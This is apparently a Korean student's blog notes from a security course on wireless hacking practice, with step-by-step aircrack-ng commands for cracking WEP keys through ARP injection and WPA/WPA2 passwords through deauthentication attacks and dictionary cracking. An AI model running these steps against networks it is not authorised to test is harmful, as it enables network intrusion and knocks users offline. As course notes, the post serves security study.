3. 무선 네트워크 해킹 실습
1) 802.11 Weakness
▣ Rogue AP
- 도둑 AP
- 내부 네트워크에 불법으로 연결된 AP
- 외부에서 내부로 침투 가능한 위험한 AP
▣ Ad-Hoc
- 내부 네트워크에 연결되어있는 상태(랜선연결)에서 Ad-Hoc을 켜면 내부 네트워크에 침투가 가능함.
- 내부 네트워크에 연결되어있지 않은 상태의 Ad-Hoc은 상관없음.
▣ Phising AP
- 허가된 AP가 아니면서 AP인척을 하여 나에게 Station이 붙게하여 개인정보를 캐냄.
- ST가 붙게 하는 법
☞ 그냥..(붙을법한 SSID로 설정)
☞ 신호 세기 (강할수록 붙을 확률이 높음)
☞ Probe 이용 (한번 붙었던 AP에 대하여 똑같은 정보로 만들어서 붙게 유도가능)
▣ WEP/WPA Crack
- 와이파이 비밀번호 암호화 방식인 WEP/WPA를 크랙하여 비밀번호를 얻을 수 있음.
▣ MAC Spoof
- MAC Spoof는 MAC 필터링을 우회하기 위해씀.
- AP가 필터링하고 있는 MAC 주소를 알기위해 이미 AP에 붙어있는 ST의 MAC 주소를 알아내야함.
▣ Mis-Config AP
- 관리자가 실수로 만든 AP
- 다른 의미로 하면 로그 AP임.
▣ DoS
2) Scanning
[칼리 리눅스]
▣ 무선 네트워크 확인
- 명령어 : # iwconfig
- Wlan Mode
☞ managed : ST의 역할
☞ monitor : 스캐닝, 해킹, AP 생성, 데이터 수집
☞ master : AP 생성
- 모니터 모드로 바꾸기
# airmon-ng start [무선인터페이스]
☞ iwconfig로 보면 mon0 인터페이스가 생성됨.
☞ 필자는 기존 wlan0가 wlan0mon이 됨.
- Scanning하기
# airodump-ng mon0
3) WEP Crack
▣ WEP Crack 방법
- 기존 WEP
☞ IV(Initial Vertor, 랜덤값)와 key를 이용하여 RC4 알고리즘에 돌리면 패킷이 암호화가 됨.
- Crack 원리
☞ RC4 알고리즘은 이미 깨져있는 알고리즘이라서 복호화가 가능함.
☞ IV와 암호화된 패킷이 존재한다면 key값을 알아낼 수 있음.
☞ 이 때, IV를 알아내는 것이 관건임! IV 는 랜덤값.
☞ IV는 25,000~30,000 만개의 패킷의 간격으로 드물게 재사용이 됨!! == 약 3만개의 패킷을 모으면 크랙이 가능!!
▣ WEP Crack
1. 무선랜 카드를 모니터링 모드로 전환.
# airmon-ng start [무선인터페이스]
2. 스캐닝 후 타겟을 정함.
# airodump-ng [무선인터페이스(monitor모드)]
3. 무선 데이터를 수집.
# airodump -c [채널] --bssid [AP MAC주소] -w [filename] [무선인터페이스(monitor모드)]
4. Data 유발을 위해 가인증을 함.
# aireplay-ng -1 5000 -e [ssid] -a [ap mac] -h [가짜 st mac] [무선인터페이스(monitor모드)]
☞ WEP : Open System 이라서 비밀번호 없이 붙을 수 있음.
☞-1 : 가 인증
☞ 5000 : 5초에 1번씩 보냄
☞ ap mac == bssid
☞ 가짜 st mac : 존재하지 않는 mac 주소
5. ARP Injection 공격으로 Data를 더 빠르게 강제 유발.
# aireplay-ng-3 -b [ap mac] -h [st mac] [무선인터페이스(monitor모드)]
☞ ARP Request 패킷과 ACK 패킷을 대량 전송.
☞ -3 : ARP Injection
----> 패킷이 약 3만개정도 모이면 창을 모두 종료함.
6. 패킷이 충분하게 덤프된 상태에서 WEP key를 크랙.
# aircrack-ng [file name]
4) WPA Crack
▣ WPA Crack
- WPA/WPA2 모두 같은 방법으로 사전파일 대입공격으로 크랙가능함.
- 4-way Handshake를 캡처하여 key 추출 가능.
- 해당 패킷 속 비밀번호를 주고받으며 확인을 하고 있기 때문에 해당 패킷을 캡처하면 됨.
- 이미 station이 AP에 붙어있다면 DoS 공격으로 연결을 끊고 다시 station이 probe 통해 재 연결할테니 그 때 캡처하면 됨!
1. 무선랜 카드를 모니터링 모드로 전환.
# airmon-ng start [무선인터페이스]
2. 스캐닝 후 타겟을 정함.
# airodump-ng [무선인터페이스(monitor모드)]
3. 무선 데이터를 수집.
# airodump -c [채널] --bssid [AP MAC주소] -w [file name] [무선인터페이스(monitor모드)]
4. WPA Handshake를 캡쳐하기 위해 DoS 공격을 수행함.
# aireplay-ng -0 [공격횟수] -a [ap mac] -c [client mac] [무선인터페이스(monitor모드)]
☞ -0 : DoS
☞ 공격횟수 : 5번이면 충분
☞ WPA handshake가 뜨면 패킷을 캡처했다는 뜻으로 종료하면 됨.
5. 사전파일을 이용하여 key를 크랙함.
--> 사전파일에 없으면 못찾아줌...
# aircrack-ng -b [ap mac] -w [사전파일명] [file name]
i2sec 대구지점 23기 수료생.
'해킹&보안 > 무선 해킹&보안' 카테고리의 다른 글
[D+4] 무선 네트워크 해킹 실습 (2) (0) | 2017.04.24 |
---|---|
[D+2] 무선 네트워크 시스템 (0) | 2017.04.23 |
[D+1] 무선 네트워크 개요 (0) | 2017.04.18 |